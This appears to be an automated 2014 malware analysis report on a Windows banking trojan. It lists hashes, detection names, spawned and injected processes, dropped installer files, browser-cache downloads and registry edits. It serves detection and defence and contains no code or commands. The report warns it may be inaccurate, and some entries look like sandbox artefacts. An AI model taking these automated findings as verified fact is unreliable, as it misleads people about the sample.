Trojan-Banker.Win32.Brasil_4dc3d0c729

by malwarelabrobot on May 8th, 2014 in Malware Descriptions.

Trojan.Win32.Badur.gvnz (Kaspersky), Dropped:Trojan.Generic.11176292 (B) (Emsisoft), Dropped:Trojan.Generic.11176292 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 4dc3d0c729444611a6a79c50a6c35493
SHA1: d8a92c6781024c67b958f9240ae209017e74e152
SHA256: e54fc6d154a86b2d9e7d173baa7673cfea18e13f34c2712aa3a7745cb0defa80
SSDeep: 12288:OUWA3Aheuswy1oAAOcekSkrHN/g8lCYc9/YeDOLdZ:OUWqist1oQcezAIEeeZ
Size: 549526 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-08-16 14:05:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan-Banker creates the following process(es):

ImeReg32.exe:1160
setup_2948-140896.exe:2632
axult.exe:1744
MBManager.exe:2480
%original file name%.exe:132
YYSpeed2.exe:2084
setup_qd304.exe:2396
setup_qd304.exe:1972
Mutual.exe:2224
YYMusic2.exe:3844
setup_open_341.:2660
axuls.exe:884
Config.exe:1952
Power.exe:2536
Power.exe:1772
WJSpeed.exe:2880
WJSpeed.exe:3020
ApkReg.exe:2652
wuauclt.exe:540
wjplay.exe:1456

The Trojan-Banker injects its code into the following process(es):

vsgrtaho.exe:1684
WJSpeed.exe:2788

File activity

The process ImeReg32.exe:1160 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%System%\gswb.ime (8657 bytes)

The process setup_2948-140896.exe:2632 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\YYMusic3\2014050713\avutil-52.dll (5520 bytes)
%Program Files%\YYMusic3\2014050713\avcodec-54.dll (23424 bytes)
%Program Files%\YYMusic3\2014050713\Data\dh.ini (56 bytes)
%Program Files%\YYMusic3\2014050713\Data\client.ini (36 bytes)
%Program Files%\YYMusic3\2014050713\Unins.exe (9320 bytes)
%Program Files%\YYMusic3\2014050713\source.dll (6584 bytes)
%Program Files%\YYMusic3\2014050713\audio.dll (3616 bytes)
%Program Files%\YYMusic3\2014050713\pthreadGC2.dll (3616 bytes)
%Program Files%\YYMusic3\2014050713\Data\version.ini (32 bytes)
%Program Files%\YYMusic3\2014050713\Data\user2.ini (22 bytes)
%Program Files%\YYMusic3\2014050713\DuiLib.dll (16288 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\配置工具\卸载YYMusic3.lnk (830 bytes)
%Program Files%\YYMusic3\2014050713\avformat-54.dll (12088 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\官方主页.lnk (334 bytes)
%Program Files%\YYMusic3\2014050713\YYMusic2.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\YYMusic3.lnk (835 bytes)
%Program Files%\YYMusic3\2014050713\SysConfig.ini (256 bytes)
%Program Files%\YYMusic3\2014050713\libav.dll (6360 bytes)
%Program Files%\YYMusic3\2014050713\channels.xml (784 bytes)
%Program Files%\YYMusic3\2014050713\favorfm.xml (440 bytes)
%Program Files%\YYMusic3\2014050713\avcore.dll (2392 bytes)
%Program Files%\YYMusic3\2014050713\YYSpeed2.exe (22552 bytes)
%Program Files%\YYMusic3\2014050713\Data\setup.ini (122 bytes)
%Program Files%\YYMusic3\2014050713\swresample-0.dll (3312 bytes)

The process axult.exe:1744 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (47709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe (54004 bytes)

The process MBManager.exe:2480 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.idx (588 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (58 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.dat (7419 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.dat (560 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.idx (2061 bytes)
%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (111712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.cmp (4529 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107405 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.idx (300 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.cmp (9639 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (210 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (196 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (0 bytes)
%Program Files%\gssoft\gswb\Dict\test.tmp (0 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (0 bytes)

The process %original file name%.exe:132 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\dciman32.dll (8 bytes)
%Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
%Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
%Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
%Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
%Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\vsgrtaho\__tmp_rar_sfx_access_check_282359 (0 bytes)

The process vsgrtaho.exe:1684 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@t3nlink[1].txt (186 bytes)
%Program Files%\vsgrtaho\axuls.exe (48238 bytes)
%Program Files%\vsgrtaho\axult.exe (42791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\popup[1].htm (627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe (426802 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_2948-140896[1].exe (606444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe (45478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\yszj_zhimeng_160110[1].exe (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pwb[1].htm (961 bytes)
%Program Files%\vsgrtaho\setup_open_341.exe (324463 bytes)
%Program Files%\vsgrtaho\pwb.dll (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (801 bytes)
%Program Files%\vsgrtaho\setup_2948-140896.exe (432700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe (49534 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adsvc2.9365[1].txt (321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].php (1121 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\vsgrtaho\pwb.dll (0 bytes)

The process setup_qd304.exe:2396 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (6 bytes)
%Program Files%\gssoft\gswb\Dict\Header.dat (2 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WbUpd.exe (26688 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\快乐女孩.gss (1552 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Tool.exe (22192 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeUtil.exe (60186 bytes)
%Program Files%\gssoft\gswb\Dict\wb.idx (66168 bytes)
%Program Files%\Common Files\gssoft\gssoft.ini (52 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe (25112 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\uninst.exe (11344 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Statistics.dll (19096 bytes)
%Program Files%\gssoft\gswb\Dict\lx.dat (99214 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\gswb32.ime (39329 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.exe (37025 bytes)
%Program Files%\gssoft\gswb\Dict\yy.dat (30464 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll (12088 bytes)
%Program Files%\gssoft\gswb\Dict\gbk.idx (15168 bytes)
%Program Files%\gssoft\gswb\Dict\url.dat (5 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WdjRelated.dll (40228 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (209 bytes)
%Program Files%\gssoft\gswb\Dict\yy.idx (100378 bytes)
%Program Files%\gssoft\gswb\Dict\py.s.idx (14184 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WdjEngine.dll (65930 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Expand.dll (46916 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\蓝色冰格.gss (1552 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\gswb64.ime (60186 bytes)
%Program Files%\gssoft\gswb\说明.txt (195 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe (15168 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeReg32.exe (7192 bytes)
%Program Files%\gssoft\gswb\Dict\gbk.dat (1856 bytes)
%Program Files%\gssoft\gswb\Dict\py.u.v1.idx (457160 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Power.exe (9608 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\MBManager.exe (35507 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Service.dll (11344 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Wizard.exe (77238 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe (8184 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe (8560 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeReg64.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (1110700 bytes)
%Program Files%\Common Files\gssoft\gswb\gswb.ini (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (11 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\aapt.exe (197953 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\休闲.gss (2392 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (6 bytes)
%Program Files%\gssoft\gswb\Dict\wb.dat (19152 bytes)
%Program Files%\gssoft\gswb\Dict\dz.dat (16288 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\环保绿.gss (1552 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (0 bytes)

The process setup_qd304.exe:1972 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.gif.partial (101143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (8533 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (0 bytes)

The process Mutual.exe:2224 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\属性设置.lnk (792 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\设置向导.lnk (792 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\环保绿.gss (42 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\官方网站.url (230 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjEngine.dll (14988 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WbUpd.exe (5873 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SkinReg.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Mutual.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\wdj_connection_wrapper.dll (2105 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Service.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\休闲.gss (601 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WDJDriverPreinstaller.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (221 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ApkReg.exe (2321 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb32.ime (8657 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\卸载光速输入法.lnk (792 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (734 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Statistics.dll (3361 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Tool.exe (4185 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb64.ime (14022 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\快乐女孩.gss (46 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\蓝色冰格.gss (34 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\休闲.gss (601 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SoftApp.ini (281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\快乐女孩.gss (46 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\aapt.exe (45940 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Wizard.exe (17627 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\MBManager.exe (7971 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Expand.dll (10815 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\输入法管理器.lnk (797 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\uninst.exe (1425 bytes)
%Program Files%\gssoft\gswb\官方网站.url (230 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg64.exe (1281 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\在线升级.lnk (785 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (208 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\蓝色冰格.gss (34 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (308 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Power.exe (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeUtil.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Config.exe (8281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\环保绿.gss (42 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjRelated.dll (9098 bytes)

The process YYMusic2.exe:3844 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\YYMusic3\2014050713\SysConfig.ini (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (3 bytes)
%Program Files%\YYMusic3\2014050713\Data\user2.ini (412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (3 bytes)
%Program Files%\YYMusic3\2014050713\Data\client.ini (42 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (0 bytes)

The process setup_open_341.:2660 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\wjplay2\20140507132818\Data\Err.html (1 bytes)
%Program Files%\wjplay2\20140507132818\Data\err.jpg (784 bytes)
%Program Files%\wjplay2\20140507132818\Data\def.jpg (1552 bytes)
%Program Files%\wjplay2\20140507132818\Data\User2.ini (60 bytes)
%Program Files%\wjplay2\20140507132818\Unins.exe (10136 bytes)
%Program Files%\wjplay2\20140507132818\Data\wj.ico (784 bytes)
%Program Files%\wjplay2\20140507132818\wjplay.exe (12088 bytes)
%Program Files%\wjplay2\20140507132818\playlist.xml (53 bytes)
%Program Files%\wjplay2\20140507132818\DuiLib.dll (16288 bytes)
%Program Files%\wjplay2\20140507132818\bottom.xml (67 bytes)
%Program Files%\wjplay2\20140507132818\Data\Def.html (902 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\配置工具\卸载wjplay2.lnk (847 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\官方主页.lnk (332 bytes)
%Program Files%\wjplay2\20140507132818\Data\loading.gif (8 bytes)
%Program Files%\wjplay2\20140507132818\Data\poptime_bg.png (1 bytes)
%Program Files%\wjplay2\20140507132818\locallist.xml (167 bytes)
%Program Files%\wjplay2\20140507132818\client.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (2125 bytes)
%Program Files%\wjplay2\20140507132818\PlayerUpdate.exe (5520 bytes)
%Documents and Settings%\All Users\Desktop\wjplay2.lnk (828 bytes)
%Program Files%\wjplay2\20140507132818\WJSpeed.exe (23424 bytes)
%Program Files%\wjplay2\20140507132818\server.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\stat.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\Data\tab_more.png (4 bytes)
%Program Files%\wjplay2\20140507132818\Data\EKanR.dat (10136 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\wjplay2.lnk (840 bytes)

The Trojan-Banker deletes the following file(s):

C:\ (0 bytes)

The process axuls.exe:884 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (9565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\IFoxInstall-y-c203945859-run-s-x[1].exe (8818 bytes)

The process Config.exe:1952 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Expand.dll (10815 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Service.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (34 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\WdjEngine.dll (14988 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107092 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (107834 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\3026bf8d9e37080c8abcaaf6df47dbf3.exe (4185 bytes)

The process Power.exe:2536 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process Power.exe:1772 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process WJSpeed.exe:2788 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\tj2[1].ashx (3 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\WJXMDT\DMSet.Xml (215 bytes)

The process ApkReg.exe:2652 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process wuauclt.exe:540 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan-Banker deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process wjplay.exe:1456 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\wjplay2\20140507132818\Data\User2.ini (380 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (62 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (0 bytes)

Registry activity

The process ImeReg32.exe:1160 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Keyboard Layout\Preload]
"1" = "00000409"
"2" = "E0200804"

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout File" = "kbdus.dll"
"Ime File" = "GSWB.IME"
"Layout Text" = "中文(简体) - 光速输入法"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Keyboard Layout\Preload]
"1"
"2"

The process setup_2948-140896.exe:2632 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\音乐FM]
"DisplayName" = "YYMusic3"
"Publisher" = "YYMusic3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\音乐FM]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\YYMusic3]
"RD" = "_2014050713"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 83 3D 27 DA 93 9C EE 59 07 B3 31 9F 42 5D D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\音乐FM]
"UninstallString" = "%Program Files%\YYMusic3\2014050713\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\音乐FM]
"DisplayIcon" = "%Program Files%\YYMusic3\2014050713\Unins.exe"

